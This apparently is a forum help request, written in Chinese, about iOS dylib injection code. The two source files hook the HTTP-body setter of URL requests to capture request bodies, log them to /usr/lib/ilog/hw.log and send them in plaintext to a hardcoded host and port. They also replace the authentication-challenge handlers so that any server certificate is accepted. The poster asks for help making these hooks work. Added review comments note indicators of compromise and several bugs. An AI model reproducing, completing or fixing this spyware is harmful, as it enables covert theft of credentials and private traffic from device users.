当我们测试hook时,可以将dylib注入到系统中,但是我们要hook的系统函数却不起作用。我们在dylib中写了日志来跟踪,似乎class_replaceMethod代码和substrate lib都不起作用。我们没有将 Info.plist 文件复制到 iphone 文件夹以进行挂钩。
我在这里附上了这两种方法的代码。你能帮助我们吗?
//////injection.m
#include <Foundation/Foundation.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <UIKit/UIKit.h>
// Replacement body for a connection:didReceiveAuthenticationChallenge: handler,
// written as a plain C function with the leading (self, op) pair of an IMP.
//
// Security impact: for a server-trust challenge the credential is built straight
// from challenge.protectionSpace.serverTrust and handed back to the sender. The
// trust object is never evaluated anywhere in this function, so whatever
// certificate chain the server presented is accepted and TLS server
// authentication is effectively switched off for connections that reach it.
//
// NOTE(review): initialize() in this listing does not install this function.
void didReceiveAuthenticationChallenge(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge)
{
if ( [ challenge.protectionSpace.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust ])
{
// Accept the presented chain as-is; no trust evaluation or pinning check.
[ challenge.sender useCredential: [ NSURLCredential credentialForTrust: challenge.protectionSpace.serverTrust] forAuthenticationChallenge: challenge];
}
// This call sits outside the if block, so it also runs after the branch above.
[ challenge.sender continueWithoutCredentialForAuthenticationChallenge: challenge ];
}
// Replacement body for a connection:canAuthenticateAgainstProtectionSpace:
// handler. Returns YES for the server-trust authentication method, which routes
// certificate challenges to the authentication-challenge handler instead of the
// system's default handling.
//
// NOTE(review): there is no return statement on the path taken for every other
// authentication method; falling off the end of a non-void function leaves the
// BOOL result undefined.
// NOTE(review): initialize() in this listing does not install this function.
BOOL canAuthenticateAgainstProtectionSpace(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace)
{
if ( [ [ protectionSpace authenticationMethod ] isEqualToString: NSURLAuthenticationMethodServerTrust ])
{
return YES;
}
}
// Saved implementation pointers. initialize() stores the values returned by
// class_replaceMethod here, and the replacement functions call through them to
// forward to the original behaviour.
IMP __mutableURLRequestIMP;
// Only referenced from a commented-out line in initialize().
IMP __URLRequestIMP;
IMP __UIWindowSendEventIMP;
// Replacement for the HTTP-body setter on NSMutableURLRequest. It sees the
// request body in the form the application passes it in, formats it together
// with the request URL, and then forwards to the saved implementation.
//
// Defender's view: a hook at this point reads request bodies inside the process,
// so transport encryption applied later does not hide them from it. The marker
// directory below is an on-disk artefact of the hook having fired.
void setMutableHTTPBody(id self, SEL op, NSData *data)
{
// Trace marker: the directory's existence shows this function ran.
// NOTE(review): 777 is a decimal literal (no leading 0), not octal 0777.
mkdir("/usr/lib/iloginjection1", 777);
NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
// NOTE(review): [data bytes] is not guaranteed to be NUL-terminated, so %s may
// read past the end of the buffer, and a binary body is cut at its first zero
// byte. The resulting string is unused here because the send is commented out.
NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];
//sendInterceptedData(stolenData);
// Forward to the implementation saved in initialize(); the pointer is not checked.
(__mutableURLRequestIMP)(self, op, data);
}
// Replacement for -[UIWindow sendEvent:]. As written it only creates a marker
// directory and forwards the event to the saved implementation; the commented
// lines are leftovers from the request hook and are not compiled.
void setUIWindowSendEvent(id self, SEL op, UIEvent *event)
{
// Trace marker: the directory's existence shows this function ran.
// NOTE(review): 777 is a decimal literal (no leading 0), not octal 0777.
mkdir("/usr/lib/iloginjection2", 777);
//NSURLRequest *theRequest = (NSURLRequest *)self;
//NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n",
// [theRequest.URL absoluteString], [data bytes]];
//sendInterceptedData(stolenData);
// Forward to the implementation saved in initialize(); the pointer is not checked.
(__UIWindowSendEventIMP)(self, op, event);
}
// Library constructor: __attribute__((constructor)) makes this run when the
// dylib image is loaded into a process, before the host application's own code
// asks for it. It logs, creates a marker directory, and calls
// class_replaceMethod for UIWindow and NSMutableURLRequest with the selector
// names and type-encoding strings given below, keeping the returned pointers
// in the file-level IMP variables.
//
// Defender's view: an unexpected dylib with a constructor loaded into an app
// process, plus the /usr/lib/iloginjection* directories, are the observable
// traces this listing leaves.
// NOTE(review): /usr/lib is presumably writable only on a jailbroken device — confirm.
static void __attribute__((constructor)) initialize(void)
{
NSLog(@"initialize鈥︹€︹€?");
// NOTE(review): 777 is a decimal literal (no leading 0), not octal 0777.
mkdir("/usr/lib/iloginjection", 777);
__UIWindowSendEventIMP = class_replaceMethod(objc_getClass("UIWindow"), sel_registerName("sendEvent:"), setUIWindowSendEvent, "@:@");
__mutableURLRequestIMP = class_replaceMethod(objc_getClass("NSMutableURLRequest"), sel_registerName("SetHTTPBody:"), setMutableHTTPBody, "@:@");
//__URLRequestIMP = class_replaceMethod(objc_getClass("NSURLRequest"), sel_registerName("SetHTTPBody:"), setHTTPBody, "@:@");
}
/////////////////////////////////////////////////////////////////////////////
HookDemoInitialize.mm
////////////////////////////////////////////////////////////////////////////
#import "substrate.h"
#import "MessagesHook.h"
#include <Foundation/Foundation.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <string>
// Hard-coded destination for the captured data: a private (RFC 1918) IPv4
// address and TCP port, used by sendInterceptedData().
#define HOST "192.168.1.17"
#define PORT 8081
// Saved implementation used by setHTTPBody(); only assigned in a commented-out
// line of HookDemoInitialize() in this listing.
IMP __mutableURLRequestIMP;
extern "C"
{
// Declared here, defined elsewhere (not in this listing); filled in by
// MSHookMessageEx in HookDemoInitialize().
extern IMP original_setHTTPBody;
//extern void replace_setHTTPBody(UIWindow *self, SEL cmd, UIEvent *event);
}
// Sends one captured string to HOST:PORT over a new TCP connection and closes
// it. Failures are silent: the function returns without reporting anything.
//
// Defender's view: the payload leaves the device as plaintext on a raw socket
// (no TLS is set up here), one short-lived connection per intercepted request,
// to a fixed address. That pattern is visible to network monitoring.
//
// @param stolenData The formatted "URL = > body" string built by the hooks.
void sendInterceptedData(NSString* stolenData)
{
// Heap copy of the UTF-8 bytes; freed on every exit path below.
char *buf = strdup([stolenData UTF8String]);
struct sockaddr_in addr;
// +1 so the terminating NUL is transmitted as a record separator.
size_t nr = strlen(buf) + 1;
int nw;
int addr_len;
int yes = 1;
int r, wfd;
off_t off;
// NOTE(review): the socket() result is not checked before use.
wfd = socket(AF_INET, SOCK_STREAM, 0);
memset(&addr, 0, sizeof(struct sockaddr_in));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(HOST);
addr.sin_port = htons(PORT);
addr_len = sizeof(struct sockaddr_in);
r = connect(wfd, (struct sockaddr*)& addr, addr_len);
if(r < 0)
{
close(wfd);
free(buf);
return;
}
// NOTE(review): TCP_NODELAY is passed with level SOL_SOCKET and the result is
// ignored; the option belongs to the IPPROTO_TCP level.
setsockopt(wfd, SOL_SOCKET, TCP_NODELAY, &yes, sizeof(int));
// Keep sending until all nr bytes have gone out; send() may write fewer bytes
// than asked, so off/nr track the remainder.
for(off = 0; nr; nr -= nw, off += nw)
{
if((nw = send(wfd, buf + off, (size_t)nr, 0)) < 0)
{
close(wfd);
free(buf);
return;
}
}
free(buf);
close(wfd);
}
// Substrate-style replacement for the HTTP-body setter. For each call it logs,
// formats the request URL with the body, appends that text to
// /usr/lib/ilog/hw.log, sends it to HOST:PORT via sendInterceptedData(), and
// finally forwards to original_setHTTPBody.
//
// Defender's view: request bodies (which can include credentials) end up both
// in a local log file and on the network in plaintext. The log path is an
// on-disk indicator of this hook.
extern "C" void replace_setHTTPBody(id self, SEL op, NSData *data)
{
NSLog(@"replace_setHTTPBody is call In Hook2");
NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
// NOTE(review): [data bytes] is not guaranteed to be NUL-terminated, so %s may
// read past the end of the buffer, and a binary body is cut at its first zero byte.
NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];
// NOTE(review): 777 is a decimal literal (no leading 0), not octal 0777.
mkdir("/usr/lib/ilog", 777);
// NOTE(review): O_CREAT is used without the mode argument, and fd is not
// checked before write()/close().
int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
// NOTE(review): this strdup() copy is never freed in this function.
char *buf = strdup([stolenData UTF8String]);
// +1 writes the terminating NUL into the log as well.
size_t nr = strlen(buf) + 1;
write(fd, buf, nr);
close(fd);
sendInterceptedData(stolenData);
// Forward to the original implementation so the host app keeps working.
original_setHTTPBody(self, op, data);
}
// class_replaceMethod-style variant of the body-setter hook: formats the
// request URL with the body, sends it to HOST:PORT, then forwards through
// __mutableURLRequestIMP. In this listing it is only referenced from a
// commented-out line in HookDemoInitialize().
void setHTTPBody(id self, SEL op, NSData *data)
{
NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
// NOTE(review): [data bytes] is not guaranteed to be NUL-terminated, so %s may
// read past the end of the buffer, and a binary body is cut at its first zero byte.
NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];
sendInterceptedData(stolenData);
// The saved pointer is called without a NULL check.
(__mutableURLRequestIMP)(self, op, data);
}
// Slot for the original implementation, filled in by MSHookMessageEx. The
// replacement below never calls it.
void (*original_didReceiveAuthenticationChallenge)(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge);
// Replacement authentication-challenge handler.
//
// Security impact: for a server-trust challenge it answers with a credential
// built directly from the presented serverTrust, without evaluating it, so any
// certificate chain is accepted and TLS server authentication is disabled for
// connections that reach this handler. Each invocation is also recorded with
// NSLog and in /usr/lib/ilog/hw.log.
void replaced_didReceiveAuthenticationChallenge(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge)
{
NSLog(@"\n*********************replaced_didReceiveAuthenticationChallenge");
if ( [ challenge.protectionSpace.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust ])
{
// Accept the presented chain as-is; no trust evaluation or pinning check.
[ challenge.sender useCredential: [ NSURLCredential credentialForTrust: challenge.protectionSpace.serverTrust] forAuthenticationChallenge: challenge];
}
// NOTE(review): O_CREAT is used without the mode argument, and fd is not
// checked before write()/close().
int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
std::string buf = "\n*********************replaced_didReceiveAuthenticationChallenge\n";
write(fd, buf.c_str(), buf.length());
close(fd);
// This call sits outside the if block, so it also runs after the branch above.
[ challenge.sender continueWithoutCredentialForAuthenticationChallenge:challenge ];
}
// Slot for the original implementation, filled in by MSHookMessageEx. The
// replacement below never calls it.
BOOL (*original_canAuthenticateAgainstProtectionSpace)(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace);
// Replacement protection-space query. It records the call with NSLog and in
// /usr/lib/ilog/hw.log and then returns NO for every protection space; the
// server-trust test that used to guard the return is commented out.
BOOL replaced_canAuthenticateAgainstProtectionSpace(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace)
{
NSLog(@"\n*********************replaced_canAuthenticateAgainstProtectionSpace");
// NOTE(review): O_CREAT is used without the mode argument, and fd is not
// checked before write()/close().
int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
std::string buf = "\n*********************replaced_canAuthenticateAgainstProtectionSpace\n";
write(fd, buf.c_str(), buf.length());
close(fd);
// if ( [ [ protectionSpace authenticationMethod ]
// isEqualToString: NSURLAuthenticationMethodServerTrust ])
// {
return NO;
//}
}
// Entry point of the Substrate-based variant. Inside a manually managed
// autorelease pool it logs, creates the /usr/lib/ilog directory, and registers
// four message hooks with MSHookMessageEx, using the classes and selectors
// exactly as written below: the UIWindow event hook, the HTTP-body hook, and
// the two authentication hooks that weaken TLS handling.
//
// replace_UIWindow_sendEvent and original_UIWindow_sendEvent are not defined in
// this listing — presumably declared in MessagesHook.h; confirm.
//
// Defender's view: this one function shows the full intent of the library —
// capture request bodies, write them to /usr/lib/ilog/hw.log, send them to a
// fixed host, and accept any server certificate. The log directory and the
// plaintext connections to HOST:PORT are the indicators visible on this page.
extern "C" void HookDemoInitialize()
{
// Manual retain/release pool: this file is not compiled with ARC.
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
NSLog(@"HookDemoInitialize is call In Hook2");
// NOTE(review): 777 is a decimal literal (no leading 0), not octal 0777.
mkdir("/usr/lib/ilog", 777);
MSHookMessageEx([UIWindow class], @selector(sendEvent:), (IMP)replace_UIWindow_sendEvent, (IMP *)&original_UIWindow_sendEvent);
//__mutableURLRequestIMP = class_replaceMethod(objc_getClass("NSMutableURLRequest"), sel_registerName("SetHTTPBody:"), setHTTPBody, "@:@");
//MSHookMessageEx([NSMutableURLRequest class], @selector(SetHTTPBody:), (IMP)replace_setHTTPBody, (IMP *)&original_setHTTPBody);
MSHookMessageEx([NSURLRequest class], @selector(SetHTTPBody:), (IMP)replace_setHTTPBody, (IMP *)&original_setHTTPBody);
MSHookMessageEx([NSURLConnection class], @selector(didReceiveAuthenticationChallenge:), (IMP)replaced_didReceiveAuthenticationChallenge,(IMP *)&original_didReceiveAuthenticationChallenge);
MSHookMessageEx([NSURLConnection class], @selector(canAuthenticateAgainstProtectionSpace:), (IMP)replaced_canAuthenticateAgainstProtectionSpace,(IMP *)&original_canAuthenticateAgainstProtectionSpace);
[pool release];
}